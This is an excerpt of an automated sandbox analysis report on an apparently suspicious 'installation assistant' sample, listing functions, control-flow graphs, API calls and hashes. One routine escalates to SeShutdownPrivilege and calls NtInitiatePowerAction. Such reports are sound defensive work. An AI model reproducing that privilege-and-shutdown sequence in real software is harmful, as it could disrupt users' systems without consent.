                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: 2a2fbee1d7c9a3d2eba2cc7c08c94828287c2b71070dfaeb5433c2f1a8836cac
                              • Instruction ID: 63e8c5f9dca0f475b8818ae9001d9aec0f6c3b33c8e1f4f2a87eee1b60ab1692
                              • Opcode Fuzzy Hash: 2a2fbee1d7c9a3d2eba2cc7c08c94828287c2b71070dfaeb5433c2f1a8836cac
                              • Instruction Fuzzy Hash: CB030375644B018FC728CF68C8D079AB7E3AFD5328759CB2DC0A64BA95DB35B44ACB40
                              Function 6C224FF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7579 6c224ff0-6c225077 CreateProcessA 7580 6c2250ca-6c2250d3 7579->7580 7581 6c2250f0-6c22510b 7580->7581 7582 6c2250d5-6c2250da 7580->7582 7581->7580 7583 6c225080-6c2250c2 WaitForSingleObject CloseHandle * 2 7582->7583 7584 6c2250dc-6c2250e1 7582->7584 7583->7580 7584->7580 7585 6c2250e3-6c225118 7584->7585
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: fe866f00ac0c20538e8acf9f87f2f30f50def09d93f50f0c859861227a65d47c
                              • Instruction ID: b96903fcb37624cda64eee47086f62b51a3a8992937ecfc67640d62c50b1f0b0
                              • Opcode Fuzzy Hash: fe866f00ac0c20538e8acf9f87f2f30f50def09d93f50f0c859861227a65d47c
                              • Instruction Fuzzy Hash: 0131E2708193808FD740DF29D198B2ABBF0EB9A318F509A1DF8D996250E7799588CF43
                              Function 6C23BC5E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7587 6c23bc5e-6c23bc7a 7588 6c23bc80-6c23bc82 7587->7588 7589 6c23be39 7587->7589 7590 6c23bca4-6c23bcc5 7588->7590 7591 6c23bc84-6c23bc97 call 6c22f9df call 6c22f9cc call 6c230120 7588->7591 7592 6c23be3b-6c23be3f 7589->7592 7594 6c23bcc7-6c23bcca 7590->7594 7595 6c23bccc-6c23bcd2 7590->7595 7609 6c23bc9c-6c23bc9f 7591->7609 7594->7595 7597 6c23bcd4-6c23bcd9 7594->7597 7595->7591 7595->7597 7599 6c23bcdb-6c23bce7 call 6c23ac69 7597->7599 7600 6c23bcea-6c23bcfb call 6c23be40 7597->7600 7599->7600 7607 6c23bcfd-6c23bcff 7600->7607 7608 6c23bd3c-6c23bd4e 7600->7608 7610 6c23bd01-6c23bd09 7607->7610 7611 6c23bd26-6c23bd32 call 6c23beb1 7607->7611 7612 6c23bd50-6c23bd59 7608->7612 7613 6c23bd95-6c23bdb7 WriteFile 7608->7613 7609->7592 7614 6c23bdcb-6c23bdce 7610->7614 7615 6c23bd0f-6c23bd1c call 6c23c25b 7610->7615 7623 6c23bd37-6c23bd3a 7611->7623 7619 6c23bd85-6c23bd93 call 6c23c2c3 7612->7619 7620 6c23bd5b-6c23bd5e 7612->7620 7617 6c23bdc2 7613->7617 7618 6c23bdb9-6c23bdbf GetLastError 7613->7618 7625 6c23bdd1-6c23bdd6 7614->7625 7631 6c23bd1f-6c23bd21 7615->7631 7624 6c23bdc5-6c23bdca 7617->7624 7618->7617 7619->7623 7626 6c23bd60-6c23bd63 7620->7626 7627 6c23bd75-6c23bd83 call 6c23c487 7620->7627 7623->7631 7624->7614 7632 6c23be34-6c23be37 7625->7632 7633 6c23bdd8-6c23bddd 7625->7633 7626->7625 7634 6c23bd65-6c23bd73 call 6c23c39e 7626->7634 7627->7623 7631->7624 7632->7592 7636 6c23be09-6c23be15 7633->7636 7637 6c23bddf-6c23bde4 7633->7637 7634->7623 7640 6c23be17-6c23be1a 7636->7640 7641 6c23be1c-6c23be2f call 6c22f9cc call 6c22f9df 7636->7641 7642 6c23bde6-6c23bdf8 call 6c22f9cc call 6c22f9df 7637->7642 7643 6c23bdfd-6c23be04 call 6c22f9f2 7637->7643 7640->7589 7640->7641 7641->7609 7642->7609 7643->7609
                              APIs
                                • Part of subcall function 6C23BEB1: GetConsoleCP.KERNEL32(?,6C23B0D0,?), ref: 6C23BEF9
                              • WriteFile.KERNEL32(?,?,6C2446EC,00000000,00000000,?,00000000,00000000,6C245AB6,00000000,00000000,?,00000000,6C23B0D0,6C2446EC,00000000), ref: 6C23BDAF
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C2446EC,6C23B0D0,00000000,?,?,?,?,00000000,?), ref: 6C23BDB9
                              • __dosmaperr.LIBCMT ref: 6C23BDFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: 4cc70eef4455c9a5328690ad4f23f602842eeda07104f513af94032717a30ea2
                              • Instruction ID: bdac1defdb3706c61c3ba50d86159d39861c3b969ff05139b0e487d96e03be90
                              • Opcode Fuzzy Hash: 4cc70eef4455c9a5328690ad4f23f602842eeda07104f513af94032717a30ea2
                              • Instruction Fuzzy Hash: 8651D8B5A0062EAFDB01DFA8C840FEEB778EF49319F141555ED08A7691D734D9058760
                              Function 6C225B90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7654 6c225b90-6c225b9c 7655 6c225b9e-6c225ba9 7654->7655 7656 6c225bdd 7654->7656 7657 6c225bab-6c225bbd 7655->7657 7658 6c225bbf-6c225bcc call 6c0f01f0 call 6c230b18 7655->7658 7659 6c225bdf-6c225c57 7656->7659 7657->7658 7668 6c225bd1-6c225bdb 7658->7668 7661 6c225c83-6c225c89 7659->7661 7662 6c225c59-6c225c81 7659->7662 7662->7661 7663 6c225c8a-6c225d49 call 6c0f2250 call 6c0f2340 call 6c229379 call 6c0ee010 call 6c227088 7662->7663 7668->7659
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C225D31
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: 04499e68ce6e24e397d4d7692b3bdab9de31861c5e468446bb81a501bdca5c0b
                              • Instruction ID: fc8da2ece3d41609b5b5b30e2dd499d43410902329368b6dd02008bf9f11dda5
                              • Opcode Fuzzy Hash: 04499e68ce6e24e397d4d7692b3bdab9de31861c5e468446bb81a501bdca5c0b
                              • Instruction Fuzzy Hash: 255124B5900B448FD725CF19C485B97BBF1BB48318F408A2DD89647B90D779B90ACB90
                              Function 6C23B925 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7699 6c23b925-6c23b939 call 6c2415a2 7702 6c23b93b-6c23b93d 7699->7702 7703 6c23b93f-6c23b947 7699->7703 7704 6c23b98d-6c23b9ad call 6c24171f 7702->7704 7705 6c23b952-6c23b955 7703->7705 7706 6c23b949-6c23b950 7703->7706 7715 6c23b9bb 7704->7715 7716 6c23b9af-6c23b9b9 call 6c22f9f2 7704->7716 7709 6c23b973-6c23b983 call 6c2415a2 CloseHandle 7705->7709 7710 6c23b957-6c23b95b 7705->7710 7706->7705 7708 6c23b95d-6c23b971 call 6c2415a2 * 2 7706->7708 7708->7702 7708->7709 7709->7702 7718 6c23b985-6c23b98b GetLastError 7709->7718 7710->7708 7710->7709 7720 6c23b9bd-6c23b9c0 7715->7720 7716->7720 7718->7704
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C24425F), ref: 6C23B97B
                              • GetLastError.KERNEL32(?,00000000,?,6C24425F), ref: 6C23B985
                              • __dosmaperr.LIBCMT ref: 6C23B9B0
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: 3de774f4666866d5eeab36bf225bad76731bea6adde9a88f171eba59c149e9b2
                              • Instruction ID: 64ff955cec4b9a0b2ab78869f725cad4ff33e3a85ca026b36d6d5a7ddc516c76
                              • Opcode Fuzzy Hash: 3de774f4666866d5eeab36bf225bad76731bea6adde9a88f171eba59c149e9b2
                              • Instruction Fuzzy Hash: C0014833B0593C1BC6048B3AA445BAE77694B8373DF296309FC1D87AC0CB60C9898690
                              Function 6C230B9C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7944 6c230b9c-6c230ba7 7945 6c230ba9-6c230bbc call 6c22f9cc call 6c230120 7944->7945 7946 6c230bbe-6c230bcb 7944->7946 7957 6c230c10-6c230c12 7945->7957 7948 6c230c06-6c230c0f call 6c23ae75 7946->7948 7949 6c230bcd-6c230be2 call 6c230cb9 call 6c23873e call 6c239c60 call 6c23b898 7946->7949 7948->7957 7963 6c230be7-6c230bec 7949->7963 7964 6c230bf3-6c230bf7 7963->7964 7965 6c230bee-6c230bf1 7963->7965 7964->7948 7966 6c230bf9-6c230c05 call 6c2347bb 7964->7966 7965->7948 7966->7948
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: 653c699208f0f0a31fe7dfe346e423a35de30f8d9a6a683060d1519abe6ff8df
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: 61F0D1F250177C6AC6211A2A8C04BCB37A99F8237CF102B15EC6C97ED0DB74D40AC6B1
                              Function 6C225960 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                              Download Yara Rule
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C225AB4
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C225AF4
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: 0a9c92fb644b02d9e616b35f36190d26d4b5c17deefed550546436b593e3eb36
                              • Instruction ID: d9bc4458262fdf3a9e6e392890037f155949473a2b910c56fa7690643fc284ad
                              • Opcode Fuzzy Hash: 0a9c92fb644b02d9e616b35f36190d26d4b5c17deefed550546436b593e3eb36
                              • Instruction Fuzzy Hash: 52513A71201B04DBD725CF25C485BE6FBF4BB04718F448A1CE8AA4BBA1DB34B549CB81
                              Function 6C22EF3F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(6C256DD8,0000000C), ref: 6C22EF52
                              • ExitThread.KERNEL32 ref: 6C22EF59
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: 398d58833eba068ac6a554b74eee086be01bdc83b38c786261af014fe3a8c95e
                              • Instruction ID: acfc9bba29e42fbd3140da7f96fcc8c9194ce2dd86f9902051ffa851f5841969
                              • Opcode Fuzzy Hash: 398d58833eba068ac6a554b74eee086be01bdc83b38c786261af014fe3a8c95e
                              • Instruction Fuzzy Hash: 96F028B150020C9FCF01AB70C409AAE7B74FF41316F104148E80997B40CF385915DB91
                              Function 6C23AF72 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 9866465296c7d2891e5056fa694211678ef422108a65c17350269c5cc1d1ec3d
                              • Instruction ID: a618c949c0f0cbae9011b2fad743970a72d6ff2def7e120ee0b8897426cbc902
                              • Opcode Fuzzy Hash: 9866465296c7d2891e5056fa694211678ef422108a65c17350269c5cc1d1ec3d
                              • Instruction Fuzzy Hash: B61136B1A0420EAFCF05CF59E945A9B7BF8EF49318F154069F809AB311D671E911CBA4
                              Function 6C243FFE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: 67a4f8f8478be660e1e7a4ace59b0525c5e995ea5b46047fbc9d53ed74e1b753
                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction Fuzzy Hash: 60014F72C0115DBFCF059FA8CD04AEE7FB5AF08214F144165FD24E26A0EB318A24DB91
                              Function 6C244457 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C244115,?,?,00000000,?,6C244115,00000000,0000000C), ref: 6C244474
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e4af2344fc419934e08eec0c36a810aab8071899cdab192e47e8f98fd54f7736
                              • Instruction ID: 66bad214d6e0c8d12cb90828a18e8956da454413607230518d828cea3b14c5cb
                              • Opcode Fuzzy Hash: e4af2344fc419934e08eec0c36a810aab8071899cdab192e47e8f98fd54f7736
                              • Instruction Fuzzy Hash: 9FD06C3250010DBBDF028F84DC06EDA7BAAFB88714F014000BE1856060C732E871EB90
                              Function 6C0F7F40 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: 781b7c5635b1c80e3829ed118207abe644a6640092ca2790c740c8b5cdaa9937
                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction Fuzzy Hash:

                              Non-executed Functions

                              Function 6C221880 Relevance: 10.5, APIs: 3, Strings: 1, Instructions: 3538COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: g)''
                              • API String ID: 4218353326-3487984327
                              • Opcode ID: c8b3518d00be24b20fd5a24fe121bc3da393e263560e2a778e797767aff3bb31
                              • Instruction ID: 180bb855d04dc52762cae1ece1f68c33719900445420d2cdedd811d4c5ac8f20
                              • Opcode Fuzzy Hash: c8b3518d00be24b20fd5a24fe121bc3da393e263560e2a778e797767aff3bb31
                              • Instruction Fuzzy Hash: 43631571654B068FC728CF28C4C0A95B7F3BFD53287198A2DC8D64BA55EB79B44ACB40
                              Function 6C225D60 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 6C225D6A
                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C225D76
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C225D84
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C225DAB
                              • NtInitiatePowerAction.NTDLL ref: 6C225DBF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3256374457-3733053543
                              • Opcode ID: caccc3565d8d84873c3efdb5825395d64670d9a0506b40539a23af648514957c
                              • Instruction ID: 4bcb91f8adb0c9e7f28f66168892e65bf20a924e4fba8d81a88dfa0dca76ffd2
                              • Opcode Fuzzy Hash: caccc3565d8d84873c3efdb5825395d64670d9a0506b40539a23af648514957c
                              • Instruction Fuzzy Hash: 5DF05470644304BBEE00BF24DD0EF5A7BB8EF45705F01491CF985A61D1D7B86998CB92
                              Function 6C0A1950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
